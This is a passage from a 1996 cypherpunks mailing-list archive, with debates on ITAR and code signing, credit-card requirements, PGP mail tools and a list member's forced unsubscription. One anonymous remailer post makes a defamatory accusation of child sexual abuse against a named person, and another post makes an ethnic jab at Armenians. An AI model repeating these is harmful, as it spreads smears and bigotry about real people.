Of course, the significance of this is between you and your lawyer.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 11:11:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <199612231530.JAA04229@bigeasy.bigeasy.com>
Message-ID: <LgLeZD40w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Omegaman" <omega@bigeasy.com> writes:
> >
> > ah, an even more warped mind that not merely condones it but
> > "looks forward to it"
> >
> > careful, timmy, your slime is showing!!
>
> Careful vladdy, your detweiler is showing.

LD not only knows more about crypto than any "cypher punk", he also
has way more balls than you, anonymous coward.

> (by the way.  Conveniently enough Tim May has put his ideas on the
> web in quite a bit of detail.  Just put "cyphernomicon" in your
> favorite web search engine)

Waste of disk space. Don't bother.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Dec 1996 12:20:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Papers Galore
Message-ID: <1.5.4.32.19961223201639.0068a180@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NSA-hosted National Information Systems Security
Conference, held in October, 1996, has made a wide
range of papers available (in PDF format), and listed in:

  http://csrc.nist.gov/nissc/1996/papers/NISSC/toc.pdf (110kb)

One panel's papers eye all-optical networks and security, 
including optical encryption, which NSA appears to be leading:

  http://csrc.nist.gov/nissc/1996/papers/NISSC/paper236/

Many others -- long and short, informative and fatuous -- 
address sizzling and old-grease sec issues -- techie, 
lawless, bad-hair-brained.

Several archists cry cyber crime and plead for vigilance 
for on-line anarcho-ebonics:

"Industrial Espionage Today and Information Wars Tomorrow."

"Rise of the Mobile State: Organized Crime in the 21st Century."

"Ethical and Responsible Behavior for Children to Senior
Citizens in the Information Age."

"Monitoring Your Employees: How Much Can You Do and What
Should You Do When You Uncover Wrongdoing?"

Despite such blow, there's much other solid reading. Take a nap 
while the PDFs glaciate in.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Mon, 23 Dec 1996 13:28:38 -0800 (PST)
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961223152042.006b5024@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:55 AM 12/23/96 -0500, Jeff Barber wrote:
>I've never seen Tim "advocate the unemployment" of anyone or any group.

Funny, did he stutter when he said he regularly *practiced* such
discrimination at Intel?  (Such discrimination being based upon Title VII's
dispirate impact scenario, a law that Tim and others disregard as is their
civic, as in civil disobedience, duty.)  I guess he was unclear when he
stated "Fuck 'em" in a follow up post.  Tim is an anarchist (and I do not
mean that in any derogatory way).  He not only advocates, but he practices
what he preaches.

>He has merely argued that an employer should be free *not* to hire an
>individual for any reason whatsoever.  Such a reason might include his/her
>language/dialect, appearance, race, gender, religion or any other
>(arbitrary-to-an-outsider) criterion.  This is a standard libertarian
>position and shouldn't be too difficult to grasp.

I think Tim's position was that if people couldnt communicate with him or
his supervisors he would not recommend their hire.  He had not stated as
you did above, although I do not doubt it is his belief.

>
>-- Jeff
>

P.S.  I have posted to rebut several political points made on the list only
to show that some of us on the list do not agree with certain viewpoints.
As Tim has pointed out, it has caused an innordinant amount of flame bait
and our signal is getting lost.  I do accept responsibility for setting
some of the fires but will now attempt to reply only to
highly-crypto-relevant material on the list.  Apparently folks get too
excited when others disagree with them.

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMr73pbpijqL8wiT1AQHLQwP/U5jakb7Ed3Sm2GpxsbNYol549jitBpOX
SI9D+cROf1jX2zz0iA6mXgwv/w9ywK5oranR7PMW7q5KB4yfy+rJQXhOLe/7Sbgp
wEMu39iZ0pFgg1yjJlFS+X1kCOjC2AkniNrb5fyW/Ifk+R7iT/8a+hNN8R8rObdA
RIDVj9xp5Jw=
=iUqA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 23 Dec 1996 13:21:18 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Ebonics
In-Reply-To: <JBieZD34w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961223161752.17839A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> John Gilmore unsubscribed me from this mailing list (in a very rude manner)
> and I am not allowed to resubscribe. I am not subscribed to this mailing list.

Funny, you post messages here, you read messages from here, IMHO, you 
haven't been unscumscribed.

> Ray Arachelian obviously lies again when he claims that I'm "obviously
> still here". But what else could be expected from an Armenian.

Right, when caught in a lie, point to the other guy, claim he's lying and 
say "What else could be expected from an Armenian."  Wheeee.  Sure Vileus, 
whatever turns you on.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sbase" <nobody@nowhere.com>
Date: Mon, 23 Dec 1996 13:27:39 -0800 (PST)
To: <dlv@bwalk.dm.com>
Subject: Re: Privtool 0.87
Message-ID: <199612232125.QAA08176@looney.actwin.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com

> That's the kind of software we need. How about a PGP aware client for
> Windows 95 and NT that would talk to POP3 and SMTP servers? Sort of
> like a drop-in replacement for the mail programs that come with Netscape
> and MS IE.

Try here: http://www.eskimo.com/~joelm/pi.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 23 Dec 1996 16:59:35 -0800 (PST)
To: Michael Gurski <mgursk1@umbc.edu>
Subject: Re: Legality of requiring credit cards?
Message-ID: <v02140b00aee4c78e10b1@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Merchants are free to adopt most any non-descrimatory policy insofar as
transactions are concerned.  If you want hassle-free shopping use legal
tender (except for rentals, where a CC is most welcome).

-Steve

>-----BEGIN PGP SIGNED MESSAGE-----
>
>It's that wonderful season again, when all the assholes are out in
>force, and people feel obligated to purchase merchandise to give to
>each other.  For various reasons, I don't believe in credit cards, and
>yet, trying to pay for something by personal check at the local
>Hecht's, they either *require* a credit card, or go through the Nazi
>check-warranty company Equifax.  However, it doesn't stop there...only
>SOME departments seem to have this requirement (Electronics/Luggage
>not requiring).  Is it legal to require credit cards?
>
>|\/|ike Gurski  mgursk1@umbc.edu  http://www.gl.umbc.edu/~mgursk1/
>finger/mail subject "send pgpkey"|"send index"  Hail Eris! -><-  O- |Member,
>1024/39B5BADD PGP Keyprint=3493 A994 B159 48B7 1757 1E4E 6256 4570  |   Team
>My opinions are mine alone, even if you should be sharing them.     |   OS/2
>            Senate Finance Committee Chair, SGA 1996-1997
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: I am not a number, I am a free man!
>
>iQCVAwUBMr2dZiKEMrE5tbrdAQGNEwQAjxsj387SAbEQnGr+8j0z12cWpREK/Y8U
>e5xCYMMwJ6J+rLip05nZ8uMHfY/anfGW5m2mMrvsVOggMh5Sv9Ljrw3u4uFl66B5
>yU3iU3couXIZx5Dv1QhGdOSZPRpIo7wZGwCGtF4z9TM+cUzEUzA8LMDgavG8fY0D
>T+yrGuzhSzg=
>=aQ97
>-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 23 Dec 1996 17:14:48 -0800 (PST)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Ebonics
In-Reply-To: <Pine.SUN.3.91.961223161752.17839A-100000@beast.brainlink.com>
Message-ID: <32BF2E0C.303D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian wrote:
> On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> > John Gilmore unsubscribed me from this mailing list (in a very rude manner)
> > and I am not allowed to resubscribe. I am not subscribed to this mailing list.

> Funny, you post messages here, you read messages from here, IMHO, you
> haven't been unscumscribed.

Dr. Vulis has in fact been forcibly unsubscribed.  He's on my "who
cypherpunks" list as of 12 Oct 1996, but does not appear as of
04 Nov, 30 Nov, and 18 Dec, when I last asked for a list.

The fact that he still reads the list and does posts only adds to the
arguments against censorship, specifically John Gilmore's censorship.
(This has got to be embarrassing for Gilmore, hee hee.  I'll bet he
practices keeping a straight face in front of a mirror, in case anyone
brings it up in person.)

If, as has been said, assassination is the ultimate form of censorship,
then Dr. Vulis has been shot, stoned, beat on, and cement-booted, but
he still lives and is a thorn (no pun intended) in the side of would-
be censors on the Internet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Mon, 23 Dec 1996 14:41:22 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Legality of requiring credit cards? (fwd)
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961223201606Z-4891@landru.novato.inference2.com>
Message-ID: <199612232241.RAA16138@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


They won't take cash, at a department store, AT CHRISTMAS?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 23 Dec 1996 18:13:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <32BF2E0C.303D@gte.net>
Message-ID: <199612240213.SAA22150@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn writes:

> Dr. Vulis has in fact been forcibly unsubscribed.  He's on my "who
> cypherpunks" list as of 12 Oct 1996, but does not appear as of
> 04 Nov, 30 Nov, and 18 Dec, when I last asked for a list.

> The fact that he still reads the list and does posts only adds to the
> arguments against censorship, specifically John Gilmore's censorship.
> (This has got to be embarrassing for Gilmore, hee hee.  I'll bet he
> practices keeping a straight face in front of a mirror, in case anyone
> brings it up in person.)

The list is archived on the Web in real time, and you don't have to 
be a subscriber to post to it.  I have participated in the list during
periods when I was not "suscrived" with little noticable loss in 
functionality. 

Facts, which, if known to Gilmore, would have prevented him from making
a public ass of himself.  Heck, we never unsubscribed Detweiler, and
he was certainly consuming orders of magnitude more bandwidth than the
good doctor ever has, regardless of what one may think of the S/N ratio. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Dec 1996 18:27:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <199612240226.SAA25202@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 12/22/96 -0800, geeman@best.com wrote:
>
>Software that is imported becomes subject to ITAR with respect to
>re-exportation, of course (but of course IANALetc.)  
>
>If you can't demonstrate to MSFT that you are
>playing by the rules --such that you have the proper export papers
>for your code if you plan to export it, for example-- they won't sign,
>even if developed outside US.

Except that it isn't clear that there are any enforceable "rules," 
particularly after the Patel decision.



>So: you develop a CSP outside US ... you have to IMPORT it to get it signed.
>It becomes subject at that point to ITAR export regs.  Unless you demonstrate
>that you fulfull those requirements, no signature.  So there's no relief by
>looking at just exporting the signature.

You've stated a position, but you haven't supported it.  It's the position 
you might expect the government to take, given its past behavior, but it 
isn't yet clear that this is the case.

Even if, arguably, once-imported software becomes subject to ITAR, it is by 
no means clear that a "signature" is in any way controlled by ITAR.  After 
all, looked at generously, the "signature" might simply be a plaque or paper 
certificate, saying "this is wonderful software!"

Remember, no matter how long that signature it, it might just happen to be 
the same string as a compressed bit of data from some other source, etc.    
The signature might be 16 bits long, for all we know.

In short, the "you can't export signatures" is simply more steps removed 
from the "you can't export crypto software."  We have yet to see anybody 
attempt to enforce this.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Norman Hardy <norm@netcom.com>
Date: Mon, 23 Dec 1996 19:16:45 -0800 (PST)
To: Dave Del Torto <stewarts@ix.netcom.com>
Subject: Re: [PGP-USERS] Password Keystroke Snarfer Programs (passphrase protection)
In-Reply-To: <1.5.4.32.19961219082542.003d493c@popd.ix.netcom.com>
Message-ID: <v03007800aee4f0e21286@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 8:45 AM -0800 12/19/96, Dave Del Torto wrote:
>At 12:25 am -0800 12/19/96, Bill Stewart wrote:
....
>>
>>Be careful - PGP goes to a lot of effort to overwrite your passphrase
>>when it's done using it; Norton or grep or other disk-crawlers are unlikely
>>to do so, because that sort of paranoia's not part of their job [elided]
>
>Indeed, and any malignant passphrase-snarfer is probably going to
>anticipate this counter-attack and scramble the text stream it saves
>invisibly so that disk sector searches will be unlikely to pop up your
>passphrase. We definitely need to build better defenses against this sort
>of thing.
>

The only way I know to solve this problem is to get a real operating system.
This excludes the Mac, DOS and its descendents.
First the kernel must be designed to prevent programs from installing
themselves wherever they wish. (Gasp, even useful prrograms!) Second
they must not be encumbered with piles of tools written by people with
no sense of security. Such tools are often installed with more authority
than they should require. There is a Unix system call that displays the
most recent command that any user has typed. This call is used by the
ps command to describe the origin of a task.

Perhaps NT is new enough that it hasn't gathered all of these holes.
I don't use NT so I wouldn't know.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 23 Dec 1996 10:01:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Privtool 0.87
Message-ID: <199612231800.TAA07537@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Grant sez:

: I've finally released a new version of Privtool -- my PGP-aware X-windows
: mailreader for Linux, SunOS, FreeBSD and Solaris. Version 0.86 is
: available on utopia.hacktic.nl in the incoming directory (and possibly
: elsewhere) and I'll be uploading 0.87 shortly. For more details and
: screenshots see http://www.c2.org/~mark/privtool/privtool.html. 

: 	Mark

It is available from: (utopia.hacktic.nl = ftp.replay.com)

ftp.replay.com/pub/replay/pub/pgp/utils/privtool/
ftp.replay.com/pub/replay/pub/pgp/utils/pgptools/

bEST Regards,
--
 Alex de Joode		    http://www.replay.com/people/adejoode
 I have a linux emulator for Win95: it's called "loadlin" ... *g*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Dec 1996 19:26:28 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
Message-ID: <199612240326.TAA29712@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 PM 12/22/96 -0800, Vladimir Z. Nuri wrote:
>Timmy writes:
>>Fortunately for the bulk of us, the likely number of deaths and economic
>>losses from such crimes of kidnapping, extortion, and even murder for hire,
>>is still likely to be vastly lower than the number of deaths caused by
>>powerful central governments enriching themselves and their cronies with
>>foreign wars. Not to mention the deaths in the Drug War, the lives wasted
>>in other interferences in private behavior, etc.
>
>imho, it's a very warped kind of mind that insinuates some evil is no
>big deal because greater evils exist in the world. 

You obviously (deliberately?) are misrepresenting May's comment above.  It 
isn't that some kinds of evil are "no big deal":  It's that quantiatively, 
refusing to accept a solution that would prevent, say, 100 deaths, simply 
because it would cause _one_ DIFFERENT death is foolish and misguided.  

If you feel inclined to deny this, consider the reverse situation:  Would 
you approve of the saving of one life if it cost 100 lives?  (all things 
being equal.)  While most people would feel uncomfortable being asked to 
make decisions of this kind, that does not mean that one outcome is not 
identifiably better than another.  






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobbi <rkluge@nunic.nu.edu>
Date: Mon, 23 Dec 1996 19:47:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: domestic laws/policies
Message-ID: <Pine.GSO.3.95.961223193517.6634C-100000@nunic.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain





hello:

I have been following the controversy regarding cryptographic software
for some time now, and I am hoping that someone on the list could clarify
a point for me:

If I wanted to develop software that employs cryptography, or a
new cryptographic algorithm, strictly for domestic use and sale, does this
algorithm have to be registered with any domestic agency? 

There is a great deal of information on Gak, and the controversy
surrounding it, but as of yet I have not been able to find out this type
of information.

thanks
jg








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 23 Dec 1996 17:44:39 -0800 (PST)
To: Michael Gurski <mgursk1@umbc.edu>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.OS2.3.95.961222151556.7261A-100000@klinzhai.nanticoke.net>
Message-ID: <Pine.LNX.3.95.961223202858.10058A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    I am glad that someone has raised this issue. Two things for myself.
Years ago I had both a checking account and a Visa card. i did not want
the interest on my Visa so I asked the clerk at Lechter's to take my check
with the drivers licensce and they said I had to show a credit card. Then
the bitch wrote my whole life's hiustory on the check. The dirver's
licensce number, my home phone number , other stuff and all the
information contained on the credit card(incidentally some inluding I
think Lechter's want at least 6 months left on the card.), I hit the roof
. They had enough information for anyone of the dozens of bank,store or
business people to really do a job on my life. I just walked out . Then
they refused me another time because there wasn't enough months left and
eventually wouldn't let me use the card at all because it had
expired(though I and my ID hadn't).
     Scenario number two was recently at the Software Etc store in
Scranton ,Pa where much to my consternation I found that the store had
written my date of birth on the check. And there is a cute younger guy
there that I like to talk shop to. SHIT.).I think that this stuff has
really gotten out of hand. 
     Maybe , the answer to all our problems is to draft a privacy bill in
varous forms and stages and each member of the list submit it to his or
her representative,congressman or senator. That is something that can
legally be done and it is practical. I say stages because what we want
will never pass the first time in its  entirety BUT we could conceiveably
get something started.
      Anybody interested email me personally as I am willing and albe to
do a share of the work.
      I will be unavailable from late Christmas eve until at least the 31
December . I will be at the cuervocon at the FT.Brown Hotel (Holiday Inn
side) for the conference that Friday and Saturday(see Cuervocon page).
                         Thanks in Advance 
                              Jappy Jolidays
                                  Deirdre A. Greene

















       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
       x   No success can compensate for failure in the home.  x
       x                                                       x
       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 23 Dec 1996 17:50:22 -0800 (PST)
To: Charles Gimon <gimonca@skypoint.com>
Subject: Re: Legality of requiring credit cards? (fwd)
In-Reply-To: <m0vc2qk-0002wCC@mirage.skypoint.com>
Message-ID: <Pine.LNX.3.95.961223204801.10058B-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


         I can't see how it is legal to allow credit card agencies. Where
is the legality if the individual doesn't want to be included in its data
bases? There is no voluntaryness on the part of the major part of the
population.Has anyone ever questioned the legality of the existence of
these credit reporting agencies.





On Sun, 22 Dec 1996, Charles Gimon wrote:

> Date: Sun, 22 Dec 1996 23:22:54 -0600 (CST)
> From: Charles Gimon <gimonca@skypoint.com>
> To: cypherpunks@toad.com
> Subject: Legality of requiring credit cards? (fwd)
> 
> Forwarded message:
> > Date: Sun, 22 Dec 1996 15:43:28 -0500 (EST)
> > From: Michael Gurski <mgursk1@umbc.edu>
> > Subject: Legality of requiring credit cards?
> > 
> > It's that wonderful season again, when all the assholes are out in
> > force, and people feel obligated to purchase merchandise to give to
> > each other.  For various reasons, I don't believe in credit cards, and
> > yet, trying to pay for something by personal check at the local
> > Hecht's, they either *require* a credit card, or go through the Nazi
> > check-warranty company Equifax.  
> > 
> 
> Equifax does business by tracking reputations, as do all credit
> reporting companies. That's how a free market handles bad checks.
> 
















       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
       x   No success can compensate for failure in the home.  x
       x                                                       x
       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 19:50:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961223152042.006b5024@mail.execpc.com>
Message-ID: <FD8eZD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Matthew J. Miszewski" <mjmiski@execpc.com> writes:
> At 08:55 AM 12/23/96 -0500, Jeff Barber wrote:
> >I've never seen Tim "advocate the unemployment" of anyone or any group.
>
> Funny, did he stutter when he said he regularly *practiced* such
> discrimination at Intel?  (Such discrimination being based upon Title VII's

So, don't buy Intel. AMD's MMX processor supposedly runs circles around Intel.

> dispirate impact scenario, a law that Tim and others disregard as is their
> civic, as in civil disobedience, duty.)  I guess he was unclear when he
> stated "Fuck 'em" in a follow up post.  Tim is an anarchist (and I do not
> mean that in any derogatory way).  He not only advocates, but he practices
> what he preaches.

No - Timmy is a "libertarian" (aka a fucking statist).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Dec 1996 22:33:22 -0800 (PST)
To: Blake Coverett <cypherpunks@toad.com>
Subject: RE: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <199612240632.WAA13453@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 PM 12/23/96 -0500, Blake Coverett wrote:
>jim bell wrote:
>> Even if, arguably, once-imported software becomes subject to ITAR, it is by 
>> no means clear that a "signature" is in any way controlled by ITAR.  After 
>> all, looked at generously, the "signature" might simply be a plaque or 
paper 
>> certificate, saying "this is wonderful software!"
>
>The signature in question (on a Win32 Crypto Service Provider) is embedded
>in the executable.  Certainly I could rip it out and inject it into an 
unsigned
>but otherwise identical copy outside the U.S., but that is obviously not
>going to be legal under ITAR.

Who says "that is obviously not going to be legal under ITAR"?  Personal 
computers themselves are devices which can do encryption, given appropriate 
software, and yet export of such devices goes on every day.  Operating 
systems are capable of calling programs like PGP, and yet they are exported 
every day.

(This is by no means a trivial issue.  If I were to ask you, "Would you 
rather somebody give you a $1000 computer and FAIL to give you a copy of 
good encryption software (which is also available, free, on the 'net), or 
give you the software and FAIL to give you the $1000 computer, I think most 
people would happily choose the former, knowing that they can easily remedy 
the former's drawbacks.)

Remember, the only reason "signatures" have any significance is if 
somebody else writes a program which looks for that signature before 
deciding whether to run a program.  If the "signature" involved simply says 
"Hi there!" (or is sufficiently short as to be easily reverse-engineerable), 
presumably the fault lies with somebody else, NOT the person who just 
happens to export 128 bits of value suspiciously identical to a value 
appended to a domestic copy of the program.


>ITAR is wrong and should be abolished, but that sort of weasling isn't 
>going to make something legal under the current laws.

It isn't necessary to "make something legal."  Ostensibly, under our legal 
system, activities are legal unless there is a law to make them illegal.  
(some would include regulations in this... I don't believe that 
constitutionally, "regulations" are enforceable against non-government 
people or corporations.)  I believe we should fight to decrease the envelope 
of what the government tries to force us/keep us from doing.

If I had proposed, 10 years ago, that programs be signed (whether or not 
they had anything to do with crypto), that would have been legally 
irrelevant under ITAR.  I argue that the fact that a program exists, 
somewhere out there, that looks at the signature before running a program, 
that cannot per se make the signature non-exportable.  (Otherwise, if NO 
program existed with those characteristics of being able to run that 
software, presumably that software could be exported freely because it was 
totally non-functional.)

If anything, if the government doesn't want crypto to leave the US, that's 
their row to hoe and they're gonna fail.  Giving ANYONE authority to export 
a program (or OS, or computer) simply because it first checks a signature, 
should not be interpreted as to put the onus on everyone else to ensure that the 
signatures are "legal."

Otherwise, it could have been just as effectively argued that once PGP 1.0 
had been written, any PC-clone ever built automatically because a device 
potentially capable of encryption, and thus the government would (arguably) 
be entitled to prohibit its export.  Since the US government hasn't insisted 
that every computer being exported since 1991 be incapable of running good 
crypto (example: PGP) presumably that is a valid precedent that merely 
enabling good crypto does not constitute some sort of automatic ban.  A 
signature enables crypto no more than a CPU or operating system does.

I say all this, not because I believe the government CAN'T do this, or WON'T 
do this, but because there is no precedent (that I know of) restricting the 
export of small pieces of data.  They aren't crypto programs, or anywhere 
close.  The only nexus of restriction is presumably crypto programs, and 
signatures aren't that!






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Dec 1996 19:50:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Both John Gilmore and Ray Arachelian are liars
In-Reply-To: <Pine.SUN.3.91.961223161752.17839A-100000@beast.brainlink.com>
Message-ID: <T59eZD46w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Mon, 23 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > John Gilmore unsubscribed me from this mailing list (in a very rude manner)
> > and I am not allowed to resubscribe. I am not subscribed to this mailing li
>
> Funny, you post messages here, you read messages from here, IMHO, you
> haven't been unscumscribed.

Now you're calling John Gilmore a liar, because he admitted pulling my plug:

]Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id CAA17866 for cypherpunks-outgoing; Sat, 2 Nov 1996 02:13:32 -0800 (PST)
]Received: from localhost (localhost [127.0.0.1]) by toad.com (8.7.5/8.7.3) with SMTP id CAA17861; Sat, 2 Nov 1996 02:13:26 -0800 (PST)
]Message-Id: <199611021013.CAA17861@toad.com>
]X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use HELO protocol
]To: cypherpunks@toad.com, gnu@toad.com
]Subject: Dr. Vulis is not on cypherpunks any more
]Date: Sat, 02 Nov 1996 02:13:26 -0800
]From: John Gilmore <gnu@toad.com>
]Sender: owner-cypherpunks@toad.com
]Precedence: bulk
]
]As stated by Dr. Vulis, he is no longer on the cypherpunks mailing
]list, and indeed majordomo@toad.com HAS been instructed to ignore his
]requests to resubscribe.
]
]I removed him, on my own initiative.  I got tired of asking him to
]stop stirring up flames.  When he posted a message saying that we'd
]have to use technical means to stop him from flaming the list, I said,
]"OK".
]
]Tim May was not involved.
]
]I've met Dr. Vulis in person.  He seemed like a reasonable guy.  I
]treated him that way for months, despite his inability to control
]himself on the list.  When he ultimately declined to control his
]outbursts after numerous personal requests, I removed him.
]
]The cypherpunks list is for discussions centered around cryptography.
]I'm sure there are several mailing lists where ethnic cleansing
]discussions would be welcome.  There are probably even mailing lists
]which encourage people to fire off their best inflammatory messages.
]If there aren't, Dr Vulis could start one.  I don't sponsor any.
]
]Cypherpunks, please resist your own temptation to bait him (or anyone
]else).  The best defense a mailing list has against flames is to
]simply ignore them.  When they don't provoke an emotional response,
]they don't accomplish the poster's goal, and the poster eventually
]wanders off in search of more naive pastures.
]
]	John Gilmore
]

Note that John clearly unsubscribed me because he didn't like the contents
of my messages. Later Timmy May claimed that it had something to do with the
size of my submissions (another lie).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 23 Dec 1996 23:17:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Zero-knowledge interactive proofs
Message-ID: <199612240717.XAA30847@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy C. Mayo prefers to have sex with little 
kids because his own penis is like that of a 
three-year-old.

          \
         o/\_ Timmy C. Mayo
        <\__,\
         '\,  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Mon, 23 Dec 1996 20:19:13 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <01BBF127.ACD7C120@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> Even if, arguably, once-imported software becomes subject to ITAR, it is by 
> no means clear that a "signature" is in any way controlled by ITAR.  After 
> all, looked at generously, the "signature" might simply be a plaque or paper 
> certificate, saying "this is wonderful software!"

The signature in question (on a Win32 Crypto Service Provider) is embedded
